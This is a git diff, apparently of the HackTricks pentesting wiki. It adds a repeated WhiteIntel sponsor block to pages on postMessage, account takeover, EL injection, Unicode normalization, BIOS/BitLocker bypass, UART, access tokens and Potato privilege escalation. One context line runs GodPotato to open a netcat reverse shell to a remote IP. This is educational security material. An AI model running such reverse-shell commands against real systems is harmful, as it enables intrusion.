||||||
|
---
|
||||||
|
|
||||||
## Send **PostMessage**
|
## Send **PostMessage**
|
||||||
|
|
||||||
**PostMessage** uses the following function to send a message:
|
**PostMessage** uses the following function to send a message:
|
||||||
|
@ -232,6 +246,18 @@ For **more information**:
|
||||||
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
|
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
|
||||||
* To practice: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
|
* To practice: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Registration Takeover
|
## Registration Takeover
|
||||||
|
|
||||||
### Duplicate Registration
|
### Duplicate Registration
|
||||||
|
@ -191,6 +205,20 @@ JSON Web Token might be used to authenticate an user.
|
||||||
|
|
||||||
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
|
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
|
||||||
|
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -12,6 +12,20 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Bsic Info
|
## Bsic Info
|
||||||
|
|
||||||
Expression Language (EL) is integral in JavaEE for bridging the presentation layer (e.g., web pages) and application logic (e.g., managed beans), enabling their interaction. It's predominantly used in:
|
Expression Language (EL) is integral in JavaEE for bridging the presentation layer (e.g., web pages) and application logic (e.g., managed beans), enabling their interaction. It's predominantly used in:
|
||||||
|
@ -258,6 +272,18 @@ Check [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://
|
||||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
|
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
|
||||||
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
|
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
**This is a summary of:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Check a look for further details (images taken form there).
|
**This is a summary of:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Check a look for further details (images taken form there).
|
||||||
|
|
||||||
## Understanding Unicode and Normalization
|
## Understanding Unicode and Normalization
|
||||||
|
@ -115,6 +129,18 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows t
|
||||||
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
|
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
|
||||||
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
|
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## BIOS Password Recovery and System Security
|
## BIOS Password Recovery and System Security
|
||||||
|
|
||||||
**Resetting the BIOS** can be achieved in several ways. Most motherboards include a **battery** that, when removed for around **30 minutes**, will reset the BIOS settings, including the password. Alternatively, a **jumper on the motherboard** can be adjusted to reset these settings by connecting specific pins.
|
**Resetting the BIOS** can be achieved in several ways. Most motherboards include a **battery** that, when removed for around **30 minutes**, will reset the BIOS settings, including the password. Alternatively, a **jumper on the motherboard** can be adjusted to reset these settings by connecting specific pins.
|
||||||
|
@ -66,6 +80,18 @@ BitLocker encryption can potentially be bypassed if the **recovery password** is
|
||||||
|
|
||||||
A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process.
|
A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process.
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Basic Information
|
## Basic Information
|
||||||
|
|
||||||
UART is a serial protocol, which means it transfers data between components one bit at a time. In contrast, parallel communication protocols transmit data simultaneously through multiple channels. Common serial protocols include RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express, and USB.
|
UART is a serial protocol, which means it transfers data between components one bit at a time. In contrast, parallel communication protocols transmit data simultaneously through multiple channels. Common serial protocols include RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express, and USB.
|
||||||
|
@ -191,6 +205,20 @@ This will list the possible contents from the EEPROM as per the signatures found
|
||||||
|
|
||||||
Although, it is necessary to note that it's not always the case that the <b>uboot</b> is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if <b>uboot</b> is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention <b>uboot</b> while booting.
|
Although, it is necessary to note that it's not always the case that the <b>uboot</b> is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if <b>uboot</b> is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention <b>uboot</b> while booting.
|
||||||
|
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -12,6 +12,20 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Access Tokens
|
## Access Tokens
|
||||||
|
|
||||||
Each **user logged** onto the system **holds an access token with security information** for that logon session. The system creates an access token when the user logs on. **Every process executed** on behalf of the user **has a copy of the access token**. The token identifies the user, the user's groups, and the user's privileges. A token also contains a logon SID (Security Identifier) that identifies the current logon session.
|
Each **user logged** onto the system **holds an access token with security information** for that logon session. The system creates an access token when the user logs on. **Every process executed** on behalf of the user **has a copy of the access token**. The token identifies the user, the user's groups, and the user's privileges. A token also contains a logon SID (Security Identifier) that identifies the current logon session.
|
||||||
|
@ -117,6 +131,19 @@ Take a look to [**all the possible token privileges and some definitions on this
|
||||||
|
|
||||||
Learn more about tokens in this tutorials: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) and [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
|
Learn more about tokens in this tutorials: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) and [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
|
||||||
|
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -12,6 +12,20 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
{% hint style="warning" %}
|
{% hint style="warning" %}
|
||||||
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_
|
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
@ -141,6 +155,18 @@ Then download [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/maste
|
||||||
|
|
||||||
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
|
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
{% hint style="warning" %}
|
{% hint style="warning" %}
|
||||||
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
|
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
@ -82,6 +96,18 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
||||||
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
|
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
|
||||||
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
Loading…
Reference in a new issue